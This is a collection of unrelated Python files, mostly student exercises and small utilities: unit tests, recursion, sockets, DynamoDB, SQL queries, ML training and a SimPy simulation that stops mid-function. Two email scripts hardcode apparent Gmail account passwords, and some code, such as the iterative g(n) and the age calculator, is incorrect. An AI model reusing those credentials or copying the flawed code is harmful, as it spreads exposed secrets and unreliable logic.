metric.add_sample("ts", {"foo": "d"}, 0, Timestamp(123, 456000000))
metric.add_sample("ts", {"foo": "e"}, 0, Timestamp(123, 456000))
metric.add_sample("ts", {"foo": "f"}, 0, Timestamp(123, 456))
yield metric
self.registry.register(MyCollector())
self.assertEqual(b"""# HELP ts help
# TYPE ts unknown
ts{foo="a"} 0.0 123.456
ts{foo="b"} 0.0 -123.456
ts{foo="c"} 0.0 123
ts{foo="d"} 0.0 123.456000000
ts{foo="e"} 0.0 123.000456000
ts{foo="f"} 0.0 123.000000456
# EOF
""", generate_latest(self.registry))
if __name__ == '__main__':
unittest.main()
|
def sumar(lista):
if not lista:
return 0
else:
return (lista[0] + sumar(lista[1:]))
print(sumar([1,2,3,4]))
|
import unittest
from unittest.mock import patch
from app.deliver import deliver
from app.meta_wrapper import MetaWrapper
from app.output_type import OutputType
class TestDeliver(unittest.TestCase):
@patch('app.deliver.encrypt_output')
@patch('app.deliver.write_to_bucket')
@patch('app.deliver.send_message')
def test_deliver(self, mock_send_message, mock_write_to_bucket, mock_encrypt_output):
encrypted_message = "This has been encrypted"
path = "dap/"
filename = "9010576d-f3df-4011-aa41-adecd9bee011"
meta_data = MetaWrapper(filename)
mock_encrypt_output.return_value = encrypted_message
mock_write_to_bucket.return_value = path
deliver(meta_data, b"bytes")
mock_send_message.assert_called_with(meta_data, path)
@patch('app.deliver.write_to_bucket')
@patch('app.deliver.send_message')
def test_deliver_seft(self, mock_send_message, mock_write_to_bucket):
path = "dap/"
filename = "9010576d-f3df-4011-aa41-adecd9bee011"
meta_data = MetaWrapper(filename)
meta_data.output_type = OutputType.SEFT
mock_write_to_bucket.return_value = path
deliver(meta_data, b"bytes")
mock_send_message.assert_called_with(meta_data, path)
|
#!/usr/bin/env python
import sys
import os
#sys.path.insert(0, '/home/mossing/code/adesnal')
import run_pipeline_tiffs as rpt
import read_exptlist as re
import numpy as np
matfile_fold = '/home/mossing/modulation/matfiles/'
suite2p_fold = '/home/mossing/data1/suite2P/results/'
def save_meanImg(datafold):
vars_of_interest = ['meanImg','meanImgE','meanImg_chan2','meanImg_chan2_corrected']
nplanes = 4
planefolds = [datafold + '/suite2p/plane%d/' % iplane for iplane in range(nplanes)]
for fold in planefolds:
ops = np.load(fold+'ops.npy',allow_pickle=True)[()]
for var in vars_of_interest:
if var in ops:
np.save(fold+var+'.npy',ops[var])
else:
print(var)
def run(exptfilename):
foldname = []
filenames = []
foldname,filenames = re.read_exptlist(exptfilename,lines_per_expt=3,fileline=1)
# for i in range(len(foldname)):
# # do matlab stuff to save cropping rectangles
# print('now saving a cropping rectangle for ' + foldname[i])
for i in range(len(foldname)):
fileparts = foldname[i].split('/')
date = fileparts[0]
animalid = fileparts[1]
expt_ids = [str(x) for x in filenames[i]]
subfold = '_'.join(expt_ids)
thisfold = suite2p_fold + animalid + '/' + date + '/' + subfold + '/'
save_meanImg(thisfold)
matlab_cmd = '"' + "s2p_output_to_opto_corrected_rois('" + thisfold + "','datafold','" + matfile_fold + "'); exit;" + '"'
print(matlab_cmd)
os.system('matlab -r ' + matlab_cmd)
if __name__ == "__main__":
run(sys.argv[1])
|
"""
A function g(n) is defined by:
g(n) = n if n < 3, and g(n) = g(n-1) + 2*g(n-2) + 3*g(n-3) if n >= 3
Write a recursive implementation of g(n) called g_recursive(n).
Write an iterative implementation of g(n) called g_iterative(n).
"""
def g_recursive(n):
n = float(n)
if n < 3:
return n
else:
return g_recursive(n-1) + 2*g_recursive(n-2) + 3*g_recursive(n-3)
def g_iterative(n):
n = float(n)
if n >= 3:
count = 0
while n >= 3:
if (n-1) < 3 and (n-2) < 3 and (n-3) < 3:
count = count + (n-1) + 2*(n-2) + 3*(n-3)
return count
else:
if (n-2) < 3 and (n-3) < 3:
count = count + (n-1) + 2*(n-2) + (n-2)
return count
else:
if (n-3) < 3:
count = count + (n-1) + 2*(n-2) + 3*(n-3) + (n-2) + \
2*(n-3) + (n-3)
return count
else:
count = count + (n-1) + 2*(n-2) + 3*(n-3)
n = n-1
else:
return n
# TEST
import unittest
class TestFunctions(unittest.TestCase):
def test_recursive(self):
self.assertEqual(g_recursive(0), 0)
self.assertEqual(g_recursive(5), 25)
self.assertEqual(g_recursive(10), 1892)
self.assertEqual(g_recursive(3.14), 4.84)
def test_iterative(self):
self.assertEqual(g_iterative(0), 0)
self.assertEqual(g_iterative(5), 25)
self.assertEqual(g_recursive(10), 1892)
self.assertEqual(g_iterative(3.14), 4.84)
if __name__ == '__main__':
unittest.main()
|
def extend(perm, n):
if(len(perm) == n):
print('-----', perm)
for k in range(n):
if k not in perm:
perm.append(k)
#print('b4 ext', perm)
extend(perm, n)
#print('a4 ext', perm)
perm.pop()
#print('pop', perm)
extend(perm=[], n=4) |
worlds["Lukin Server"] = "/var/in"
renders["Overworld"] = {
"world": "Lukin Server",
"title": "Overworld",
"rendermode": smooth_lighting,
"dimension": "overworld",
}
renders["Nether"] = {
"world": "Lukin Server",
"title": "Nether",
"rendermode": nether_smooth_lighting,
"dimension": "nether",
}
outputdir = "/var/out"
|
print("Enter 'x' for exit.")
string = raw_input("Enter any string to remove all vowels from it: ")
newstr = string;
print("\nRemoving vowels from the given string...");
#vowels = ('a', 'e', 'i', 'o', 'u');
for x in string:
if x=='a' or x=='e' or x=='i' or x=='o' or x=='u':
newstr = newstr.replace(x,"");
print("New string after successfully removed all the vowels:");
print(newstr);
|
import socket
import os
from Enigma import Enigma
# Client can send and recive files to and from server
# Encryption and Decryption only work on TEXT FILES !
def Recv_File(s):
filename = input("ENTER FILE NAME : ")
if filename != 'q':
#print("this far")
s.send(filename.encode())
#print("this far")
data = s.recv(1024)
#print(data[:6])
#print("this far")
if data[:6].decode() == "EXISTS":
#print("this far4")
filesize = int(data[6:])
message = input(f"File EXISTS {filesize} bytes do you want to DOWNLOAD (Y/N) ")
if message == 'Y':
s.send('OK'.encode())
f = open('new_' + filename,'wb')
data = s.recv(1024)
total_recv = len(data)
#print("Data now is" + data.decode())
f.write(data)
while total_recv < filesize:
data = s.recv(1024)
total_recv += len(data)
#print("IN loop Data now is" + data.decode())
f.write(data)
progress = total_recv/float(filesize)*100
print(f"Progress {progress} % Done")
print("DOWNLOAD COMPLETE")
else: print("Exiting ...")
else:
print("FILE DOES NOT EXIST")
s.close()
def Send_File(sock):
filename = input("Enter file NAME: ")
sock.send(filename.encode())
if os.path.isfile(filename):
print("File EXISTS")
sock.send(("EXISTS" + str(os.path.getsize(filename))).encode())
user_response = sock.recv(1024)
if user_response[:2].decode() == 'OK':
#print("this far")
with open(filename,'rb') as f:
#print("this far1")
bytes_to_send = f.read(1024)
sock.send(bytes_to_send)
while bytes_to_send != "".encode():
#print("this far2")
bytes_to_send = f.read(1024)
#print(bytes_to_send)
sock.send(bytes_to_send)
print("FILE SENT!")
else:
print("Error user_response not ok");
sock.close()
else:
print("File does not EXIST")
sock.send("FILE DOES NOT EXIST".encode())
sock.close();
def Encrypt():
disks = input("Enter disks position Must be from 0-3 d1[] d2[] d3[] \n Like this '012 or 212 or 000' : ") #enter like 000/012/222/333/011
filename = input("Enter file name: ")
while len(disks)>3:
disks = input("Enter disks position 0-3 d1[] d2[] d3[] : ")
if os.path.isfile(filename):
f = open(filename,"r")
LineString = f.read()
f.close()
else:
print("File does not exist !")
f = open("enc" + filename,"a")
f.write(Enigma.encrypt(0,int(disks[0]),int(disks[1]),int(disks[2]),LineString))
f.close()
def Decrypt():
disks = input("Enter disks position 0-3 d1[] d2[] d3[] \n Like this '012 or 212 or 000' : ")
filename = input("Enter file name: ")
while len(disks)>3:
disks = input("Enter disks position 0-3 d1[] d2[] d3[] : ")
if os.path.isfile(filename):
f = open(filename,"r")
LineString = f.read()
f.close()
else:
print("File does not exist !")
f = open("dec" + filename,"a")
f.write(Enigma.decrypt(0,int(disks[0]),int(disks[1]),int(disks[2]),LineString)) # iska oshte 1 parametur ?
def Main():
host = '127.0.0.1' #put server ip here/ currently set up for local testing
port = 5000
s = socket.socket()
s.connect((host,port))
#print("CONNECTED to" + str(s))
print(s.recv(1024).decode())
choice = input("Enter your choice ")
s.send(choice.encode())
#print("thisfar0")
if choice == "1":
#print("thisfar1")
print(s.recv(1024).decode())
Send_File(s)
elif choice == "2":
print(s.recv(1024).decode())
Recv_File(s)
elif choice == "3":
Encrypt()
elif choice == "4":
Decrypt()
else:
print("Choice error !")
s.close()
if __name__ == '__main__':
Main()
|
import datetime
print(" age calculator ")
birth_year = int(input("Enter your year of birth: \n"))
birth_month = int(input("Enter your month of birth: \n"))
birth_day = int(input("Enter your day of birth: \n"))
current_year = datetime.date.today().year
current_month = datetime.date.today().month
current_day = datetime.date.today().day
age_year = current_year - birth_year
age_month = abs(current_month - birth_month)
age_day = abs(current_day - birth_day)
print("Your exact age is: ", age_year, "Years", age_month, "months and", age_day, "days")
|
#!/usr/bin/env python
import asyncio
import websockets
import json
from time import sleep
async def hello(uri):
async with websockets.connect(uri) as websocket:
await websocket.send("Hello world!")
async def test2(uri):
async with websockets.connect(uri) as websocket:
await websocket.send("Here is fun!")
greeting = await websocket.recv()
greeting = json.loads(greeting)
print("greeting " + greeting['desc'])
async def longwait(uri):
async with websockets.connect(uri) as ws:
while True:
# going to have to use if statements and JSON objects to determine what kind of event because I can't make custom events with this client library ugh
sleep(2)
await ws.send("Hello world!")
greeting = await ws.recv()
greeting = json.loads(greeting)
print("greeting " + greeting['desc'])
print("Outside the loop")
# asyncio.get_event_loop().run_until_complete(
# hello('ws://socketio-tutorial-dgoodman.c9users.io:80'))
# asyncio.get_event_loop().run_until_complete(
# test2('ws://socketio-tutorial-dgoodman.c9users.io:80')
# )
# So since this is async now I think we might just make one master connection and have the events triggered inside
asyncio.get_event_loop().run_until_complete(
longwait('ws://socketio-tutorial-dgoodman.c9users.io:80')
)
print("done!")
|
while True :
try:
n = int(input("Tentukan banyak bilangan n = "))
nlist = []
for i in range(n):
print('')
print('n ke',i+1)
x = int(input("Masukkan nilai n = "))
nlist.append(x)
print('')
nlist.sort(reverse=True)
print('n =',nlist)
break
except ValueError:
print("Input harus integer")
continue |
class DynamoDB:
def __init__(self, client):
self._client = client
""" :type : pyboto3.dynamodb """
def create_table(self, table, attribute_definitions, key_schema, iops):
print("Creating DynamoDB table...")
return self._client.create_table(
TableName=table,
AttributeDefinitions=attribute_definitions,
KeySchema=key_schema,
ProvisionedThroughput=iops
)
def describe_table(self, table):
print("Describing DynamoDB table with name " + table)
return self._client.describe_table(TableName=table)
def update_read_write_capacity(self, table_name, new_read_capacity, new_write_capacity):
print("Updating Provisioned Throughput of table with name " + table_name)
return self._client.update_table(
TableName=table_name,
ProvisionedThroughput={
'ReadCapacityUnits': new_read_capacity,
'WriteCapacityUnits': new_write_capacity
}
)
def delete_table_with_name(self, table_name):
print("Deleting DynamoDB table with name " + table_name)
return self._client.delete_table(TableName=table_name) |
"""SQL queries that answer the story questions about cities and cost of living
in Germany. Note: the tables.db file needs to be in the same location as this
python file in order for it to run correctly."""
import sqlite3
from os import linesep
def get_top_density_low_cost(c):
"""select the five cities with the highest density, that have a single
person cost of living under 750 euro a month. Return fields: cities,
density, and single person cost"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT wiki.city, density_km2, single_person '
'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
'WHERE single_person < 750 '
'ORDER BY density_km2 DESC '
'LIMIT 5')
return cursor.fetchall()
def get_highest_family_cost(c):
"""select the city with the highest monthly living cost for a family of
four where the density is < 1500 people per square km.
Return fields: city and cost"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT wiki.city, MAX(family_of_four) '
'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
'WHERE density_km2 < 1500')
return cursor.fetchall()
def get_lowest_single_cost(c):
"""select the city with the lowest monthly living cost for a single person
and a population over 300,000. Return fields: city, population, and cost"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT wiki.city, MIN(single_person) '
'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
'WHERE population > 300000')
return cursor.fetchall()
def get_total_area(c):
"""select the total area in km2 of all the cities that we collected."""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT SUM(area_km2) '
'FROM wiki')
# this returns a tuple in a list, so let's index in to get the number
return cursor.fetchall()[0][0]
def get_avg_family_cost(c):
"""select the average monthly living cost for a family of four"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT AVG(family_of_four) '
'FROM numbeo')
# this returns a tuple in a list, so let's index in to get the number
return cursor.fetchall()[0][0]
def get_avg_single_cost(c):
"""select the average monthly living cost for a single person"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT AVG(single_person) '
'FROM numbeo')
# this returns a tuple in a list, so let's index in to get the number
return cursor.fetchall()[0][0]
def get_avg_sg_cost_NRW(c):
"""select the average monthly living cost for a single person in the state
of North Rhine-Westphalia"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT AVG(single_person) '
'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
'WHERE state="North Rhine-Westphalia"')
# this returns a tuple in a list, so let's index in to get the number
return cursor.fetchall()[0][0]
def get_avg_fam_cost_NRW(c):
"""select the average monthly living cost for a single person in the state
of North Rhine-Westphalia"""
with c:
cursor = c.cursor()
cursor.execute(
'SELECT AVG(family_of_four) '
'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
'WHERE state="North Rhine-Westphalia"')
# this returns a tuple in a list, so let's index in to get the number
return cursor.fetchall()[0][0]
if __name__ == '__main__':
c = sqlite3.connect('tables')
top_5 = get_top_density_low_cost(c)
top_5_cities = [data[0] for data in top_5]
max_cost = get_highest_family_cost(c)
min_cost = get_lowest_single_cost(c)
total_area = get_total_area(c)
avg_fam_cost = get_avg_family_cost(c)
avg_fam_NRW_cost = get_avg_fam_cost_NRW(c)
avg_sg_cost = get_avg_single_cost(c)
avg_sg_NRW_cost = get_avg_sg_cost_NRW(c)
print("Five highest density cities that have a cost of living below 750"
"euro per month for a single person:")
print(", ".join(top_5_cities), linesep)
print("City with the highest monthly cost of living for a family of four "
"and density below 1500 people per square km:")
print("%s. Cost in euro: %s" % max_cost[0], linesep)
print("City with the lowest monthly cost of living for a single person "
"and population over 300,000:")
print("%s. Cost in euro: %s" % min_cost[0], linesep)
print("Total area of the cities in our database in square kilometres:")
print("%.2f" % total_area, linesep)
print("Average monthly family cost in euro: %.2f" % avg_fam_cost)
print("Average monthly family person cost in euro in NRW: %.2f" %
avg_fam_NRW_cost)
print("Average monthly single person cost in euro: %.2f" % avg_sg_cost)
print("Average monthly single person cost in euro in NRW: %.2f" %
avg_sg_NRW_cost)
|
import smtplib
gmail_user = 'moffel.piertje420@gmail.com'
gmail_password = 'Welkom01!'
sent_from = 'Karbonkel@student.hu.nl'
to = ['mauro.bijvank@student.hu.nl']
subject = 'Karbonkel ziet dat jij de verkeerde RFID-tag gebruikt!'
body = "Karbonkel steelt je schoenen vannacht!!\n\n- Karbonkel"
email_text = """\
From: %s
To: %s
Subject: %s
%s
""" % (sent_from, ", ".join(to), subject, body)
try:
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.ehlo()
server.login(gmail_user, gmail_password)
server.sendmail(sent_from, to, email_text)
server.close()
print( 'Email sent!')
except:
print( 'Something went wrong...') |
import random
class Lutador:
def __init__(self, nome, peso, forca , ginga, arteMarcial="MMA"): # ginga,também chamada de agilidade ou destreza pelos leigos.
if (not( isinstance(nome, str))):
print("Atributo nome tem que ser do tipo string.")
return None
if (not( isinstance(peso, int ) or isinstance(peso, float ))):
print("Atributo peso tem que ser do tipo int ou float.")
return None
if (not( isinstance(forca, int))):
print("Atributo forca tem que ser do tipo int.")
return None
if (not( isinstance(ginga, int))):
print("Atributo ginga tem que ser do tipo int.")
return None
if (not( isinstance(arteMarcial, str))):
print("Atributo arteMarcial tem que ser do tipo string.")
return None
self.nome = nome
self.peso = peso
self.forca = forca
self.arteMarcial = arteMarcial
self.ginga = ginga
self.historicoDeLutas = []
def __repr__(self):
return f'Pesando incríveis {self.peso} kilos, com uma inacreditável força de {self.forca}, uma ginga invejável de {self.ginga} , mestre em {self.arteMarcial}. O inigualável Luuutador {self.nome}!!! '
def atualizaHistorico(self,resultadoLuta):
self.historicoDeLutas += [resultadoLuta]
class Luta:
def __init__(self, lutador1, lutador2):
if(not( isinstance(lutador1,Lutador) and isinstance(lutador2,Lutador))):
print("Atributos da classe Luta devem pertencer a classe Lutador")
return None
diferncaPeso = abs(lutador1.peso - lutador2.peso)
if( diferncaPeso > 6 ):
print("Lutadores não podem ter pesos muito diferentes")
return None
self.lutador1 = lutador1
self.lutador2 = lutador2
def __repr__(self):
return f'O grande comfronto de {self.lutador1.nome} contra {self.lutador2.nome}!'
def informacoes(self):
print(f'No canto direito {self.lutador1.nome} pesando {self.lutador1.peso}, com força de {self.lutador1.forca}, ginga de {self.lutador1.ginga} especializado em {self.lutador1.arteMarcial}, no canto esquerdo o adversário {self.lutador2.nome} pesando {self.lutador2.peso}, com força de {self.lutador2.forca}, ginga de {self.lutador2.ginga} especializado em {self.lutador2.arteMarcial}')
def registraCombate(self):
pontosL1 = self.lutador1.forca + self.lutador1.ginga
pontosTotais = pontosL1 + self.lutador2.forca + self.lutador2.ginga
chanceDeVitoriaL1 = pontosL1 / pontosTotais
acaso = random.random()
resultadoL1 = chanceDeVitoriaL1 >= acaso
self.lutador1.atualizaHistorico(['vitoria']) if resultadoL1 else self.lutador1.atualizaHistorico(['derrota'])
self.lutador2.atualizaHistorico(['vitoria']) if not(resultadoL1) else self.lutador2.atualizaHistorico(['derrota'])
vencedor = self.lutador1.nome if resultadoL1 else self.lutador2.nome
print(f'{vencedor} venceu o confronto de hoje! Palmas para ele!! (barulho de palmas)')
luchador1 = Lutador('Kleber',120,5000,3000,"capoeira")
print(luchador1)
luchador2 = Lutador('Waldisney',125,5050,2400,"muay thai")
print(luchador2)
lucha = Luta(luchador1,luchador2)
print(lucha)
lucha.registraCombate()
lucha.registraCombate()
lucha.registraCombate()
lucha.informacoes()
print(luchador1.historicoDeLutas,luchador2.historicoDeLutas)
luchador3 = Lutador('Jamon',145,2000,5090)
luchador4 = Lutador('Guilhermo',85,2100,4050)
combateInvalido = Luta(luchador3,luchador4)
luchador5 = Lutador("so","para","testar","mes","mo")
lucha2 = Luta(luchador5,22)
|
"""
Matchingpennies EEG experiment
"""
study_name = "eeg_matchingpennies"
bids_root = "~/mne_data/eeg_matchingpennies"
deriv_root = "~/mne_data/derivatives/mne-bids-pipeline/eeg_matchingpennies"
subjects = ["05"]
task = "matchingpennies"
ch_types = ["eeg"]
interactive = False
reject = {"eeg": 150e-6}
conditions = ["raised-left", "raised-right"]
contrasts = [("raised-left", "raised-right")]
decode = True
interpolate_bads_grand_average = False
|
#!/usr/bin/env python
import importlib
from nervosum.cli import nervosum_parser
def main() -> None:
args = nervosum_parser.parse_args()
module = importlib.import_module(args.nervosum_module)
module.execute(args) # type: ignore
if __name__ == "__main__":
main()
|
import smtplib
import socket
fromaddr = 'mikkel.raspberry@gmail.com'
toaddr = 'mikkel.svagard@gmail.com'
username = fromaddr
password = 'RaspberryPi'
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com",80))
yourIP = (s.getsockname()[0])
s.close()
text = "Current IP: " + str(yourIP)
print text
msg = "\r\n".join([
"Fom: " + fromaddr,
"To: " + toaddr,
"Subject: " + text,
"",
""
])
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddr, msg)
server.quit()
print "message sent"
|
# 数值
# 在Python数值分三类: 整数,浮点数(小数),复数
# 在Python中所有整数都是int类型
a = 10
b = 20
# 在Python中整数的大小没有限制,可以是无限循环大的数
c = 1 ** 100
print(a)
print(b)
print(c)
# 如果数字过长,可以使用下划线作为分隔符
d = 123_456_789
print(d)
# 其他进制的数
# e = 0123 10进制数不能以0开头
# 其他进制的整数,只要数字打印时都是以十进制显示
# 二进制
f = 0b10
# 八进制
g = 0o10
# 十六进制
h = 0x10
print(f)
print(g)
print(h)
print(1-5)
# 浮点数(小数),在Python中所有的小数都是float类型
i = 1.23
print(i)
#对浮点数进行运算时,可能得到一个不精确的结果
print(2-2.23)
print(0.1 + 0.2)
|
from tacotron2_gst.text import symbols
import yaml
"""
Adapted from https://github.com/jaywalnut310/glow-tts/blob/master/utils.py
"""
class HParams():
def __init__(self, **kwargs):
for k, v in kwargs.items():
if type(v) == dict:
v = HParams(**v)
self[k] = v
def keys(self):
return self.__dict__.keys()
def items(self):
return self.__dict__.items()
def values(self):
return self.__dict__.values()
def __len__(self):
return len(self.__dict__)
def __getitem__(self, key):
return getattr(self, key)
def __setitem__(self, key, value):
return setattr(self, key, value)
def __contains__(self, key):
return key in self.__dict__
def __repr__(self):
return self.__dict__.__repr__()
def create_hparams(model_dir: str) -> HParams:
with open(model_dir, "r") as f:
config = yaml.safe_load(f)
hparams = HParams(**config)
# Next line overwrites dummy variable from YAML
hparams.model.n_symbols = len(symbols)
return hparams
|
# flake8: noqa
from __future__ import absolute_import
import pytest
def pytest_addoption(parser):
parser.addini('df_cache_root_dir', 'directory of the df_cache_root files')
parser.addini('df_prep_cache_root_dir', 'directory of the df_prep_cache_root files')
from ._fixtures import *
|
from datasets import load_dataset
from transformers import AutoTokenizer, DataCollatorWithPadding
from transformers import TrainingArguments
from transformers import AutoModelForSequenceClassification
from transformers import Trainer
import numpy as np
from datasets import load_metric
raw_datasets = load_dataset("glue", "mrpc")
checkpoint = "bert-base-uncased"
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
def tokenize_function(example):
return tokenizer(example["sentence1"], example["sentence2"], truncation=True)
def compute_metrics(eval_preds):
metric = load_metric("glue", "mrpc")
logits, labels = eval_preds
predictions = np.argmax(logits, axis=-1)
return metric.compute(predictions=predictions, references=labels)
tokenized_datasets = raw_datasets.map(tokenize_function, batched=True)
data_collator = DataCollatorWithPadding(tokenizer=tokenizer)
training_args = TrainingArguments("test-trainer", evaluation_strategy="epoch")
model = AutoModelForSequenceClassification.from_pretrained(checkpoint, num_labels=2)
trainer = Trainer(
model,
training_args,
train_dataset=tokenized_datasets["train"],
eval_dataset=tokenized_datasets["validation"],
data_collator=data_collator,
tokenizer=tokenizer,
compute_metrics=compute_metrics
)
trainer.train()
predictions = trainer.predict(tokenized_datasets["validation"])
print(predictions.predictions.shape, predictions.label_ids.shape)
preds = np.argmax(predictions.predictions, axis=-1)
metric = load_metric("glue", "mrpc")
metric.compute(predictions=preds, references=predictions.label_ids)
|
#!/bin/python3
import datetime
import network
import os
import sys
import shutil
import zipfile
from getch import getch
from markov import Markov
OUTFILE = "data.txt"
GOODFILE = "good.txt"
APP_NAME = "NotNews"
VERSION_MAJOR = 0
VERSION_MINOR = 0
VERSION_BUILD = 1
# TODOlist:
# TODO:
# Get data from panorama.pub?
# generate great news
# post it every hour (twitter, telegram, vk)
# clear old data and repeat on a new day
# add copyrights
def unique(filename):
uniqlines = set(open(filename, encoding="utf-8").readlines())
open(filename, 'w', encoding="utf-8").writelines(uniqlines)
def parse_files(dirname):
files = os.listdir(dirname)
outfile = open(OUTFILE, 'w', encoding="utf-8")
nonBreakSpace = u'\xa0'
for filename in files:
with open(dirname + "/" + filename, encoding="utf-8") as f:
next(f)
for line in f:
data = line.split("\t")
value = data[1].replace(""", "\"").replace(nonBreakSpace, " ")
outfile.write(value + "\n")
outfile.close()
unique(OUTFILE)
def get_version():
return "%d.%d.%d" % (VERSION_MAJOR, VERSION_MINOR, VERSION_BUILD)
def get_about_info():
return ("\n" + APP_NAME + " " + get_version() + " Copyright (C) 2020-2021 Yaroslav Zotov.\n" +
"All news data from https://mediametrics.ru/\n" +
"This program comes with ABSOLUTELY NO WARRANTY.\n" +
"This is free software under MIT license; see the LICENSE file for copying conditions.\n")
def get_help_info(): # TODO: help info
return ("\n" + APP_NAME + " " + get_version() + " Copyright (C) 2020-2021 Yaroslav Zotov.\n")
def main(argv):
update_data = False
generate_sentences = False
interactive_mode = False
if len(argv) < 2:
print("No params specified. Using default values.")
argv.extend(("-u", "-g"))
args_dict = { i : True for i in argv }
if "-u" in args_dict:
update_data = True
if "-g" in args_dict:
generate_sentences = True
if "-h" in args_dict:
print(get_help_info())
return
if "-a" in args_dict:
print(get_about_info())
return
if "-i" in args_dict:
interactive_mode = True
if update_data:
dirname = "rawdata"
shutil.rmtree(dirname, ignore_errors=True)
filename = "news.zip"
yesterday = datetime.date.today() - datetime.timedelta(days=1)
network.download_file(network.URL.format(yesterday), filename)
with zipfile.ZipFile(filename, 'r') as zip_ref:
zip_ref.extractall(dirname)
parse_files(dirname + "/day")
if generate_sentences:
markov = Markov(OUTFILE)
markov.get_sentences()
if interactive_mode:
markov = Markov(OUTFILE)
outfile = open(GOODFILE, 'a', encoding="utf-8") # TODO: post these news
while True:
sentence = markov.generate_sentence()
print(sentence)
user_input = getch()
if user_input == "\x1b":
break
elif user_input == "+":
outfile.write(sentence + "\n")
pass
outfile.close()
if __name__ == '__main__':
try:
main(sys.argv)
except KeyboardInterrupt:
exit()
except EOFError:
exit()
|
from django.shortcuts import render
# Create your views here.
def music_list(request):
return render(request, 'music/music_list.html', {}) |
def main():
#escribe tu código abajo de esta línea
import math
peso = float(input("Peso en kg: "))
altura = float(input("Altura en m: "))
if peso>0 and altura>0:
índice= (peso)/(altura**2)
if índice<20:
print ("PESO BAJO")
elif 20 <= índice < 25:
print ("NORMAL")
elif 25 <= índice < 30:
print ("SOBREPESO")
elif 30 <= índice < 40:
print ("OBESIDAD")
elif índice >= 40:
print ("OBESIDAD MORBIDA")
else:
print("Revisa tus datos, alguno de ellos es erróneo.")
pass
if __name__=='__main__':
main()
|
from django.db.models.query import QuerySet
from django.shortcuts import render
from rest_framework.viewsets import ModelViewSet
from backend_app.serializers import SubjectSerializer, TitleSerializer
from backend_app.models import Subject, Title
class SubjectViewSet(ModelViewSet):
queryset = Subject.objects.all()
serializer_class = SubjectSerializer
class TitleViewSet(ModelViewSet):
queryset = Title.objects.all()
serializer_class = TitleSerializer
|
import simpy
import random
import math
import numpy as np
SIM_TIME = 10 * 60 * 60 * 1000
FRAME = 1000
packet_number = 0
TIME_BETWEEN_PACKETS = 15 * 60 * 1000
EXPOVARIATE = 0
RANDINT = 1
RANDOMIZATION_SCHEME = EXPOVARIATE
TX_SLEEP_RATE = 1/1000
RX_SLEEP_RATE = 1/1000
TX_SLEEP_RANGE = (500, 750)
RX_SLEEP_RANGE = (500, 750)
#TX_SLEEP_RATES = [100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000, 2500, 3000]
#RX_SLEEP_RATES = [100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000, 2500, 3000]
TX_SLEEP_RATES = np.arange(100, 3100, 100)
RX_SLEEP_RATES = np.arange(100, 3100, 100)
def int_from_range(range):
return random.randint(range[0], range[1])
ACK_TIME = 5
TRANSMIT_SLOT = 9
def format_time(time: int):
milliseconds = time % 1000
total_seconds = time / 1000
seconds = total_seconds % 60
minutes = total_seconds / 60 % 60
hours = total_seconds / 60 / 60 % 60
return '%d:%d:%d:%d' % (hours, minutes, seconds, milliseconds)
class Packet:
def __init__(self, identifier, arrival_time):
self.identifier = identifier
self.arrival_time = arrival_time
self.transmit_time = 0
class Node:
def __init__(self, id):
self.id = id
self.transmitting = False
self.sleep_time_total = 0
self.tx_mode_ticks = 0
self.packet_list = []
def run(self, env, parent, child, tx, rx):
while True:
if (len(self.packet_list) > 0) and (child is not None):
tx_cycle_start_time = env.now
sleep_time = 0
if RANDOMIZATION_SCHEME == EXPOVARIATE:
sleep_time = random.expovariate(tx)
else :
sleep_time = int_from_range(tx)
self.sleep_time_total += sleep_time
yield env.timeout(sleep_time)
self.packet_list[0].transmit_time += sleep_time
# print('%s> node %d starts transmitting' % (format_time(env.now), self.id))
self.transmitting = True
yield env.timeout(TRANSMIT_SLOT)
self.transmitting = False
yield env.timeout(ACK_TIME)
self.tx_mode_ticks += env.now - tx_cycle_start_time
else:
sleep_time = 0
if RANDOMIZATION_SCHEME == EXPOVARIATE:
sleep_time = random.expovariate(rx)
else :
sleep_time = int_from_range(rx)
self.sleep_time_total += sleep_time
yield env.timeout(sleep_time)
# print('%s> node %d starts receiving' % (format_time(env.now), self.id))
for i in range(TRANSMIT_SLOT):
if (parent is not None) and (parent.transmitting == True):
break
else:
yield env.timeout(1)
transmission_ticks_recorded = 0
while (parent is not None) and (parent.transmitting == True):
transmission_ticks_recorded += 1
yield env.timeout(1)
if transmission_ticks_recorded == TRANSMIT_SLOT:
# print('%s> node %d received packet' % (format_time(env.now), self.id))
self.packet_list.append(parent.packet_list.pop(0))
self.packet_list[0].transmit_time += TRANSMIT_SLOT + ACK_TIME
yield env.timeout(ACK_TIME)
def create_packet(node, env):
global packet_number
while True:
# Infinite loop for generating packets
#yield env.timeout(random.expovariate(arrival_rate))
#print("pkr generation: {0}".format(env.now))
yield env.timeout(TIME_BETWEEN_PACKETS)
# print('%s> new packet' % format_time(env.now))
arrival_time = env.now
new_packet = Packet(packet_number, arrival_time)
packet_number += 1
node.packet_list.append(new_packet)
def varying_rate():
f = open("varying_rate.csv", "w")
f.write("tx_rate,rx_rate,pkt_success,n0_awake_time,n1_awake_time,avg_transmission_time_per_pkt\n")
for tx_ms, rx_ms in zip(TX_SLEEP_RATES, RX_SLEEP_RATES):
tx_rate = 1 / tx_ms
rx_rate = 1 / rx_ms
packet_number = 0
env = simpy.Environment()
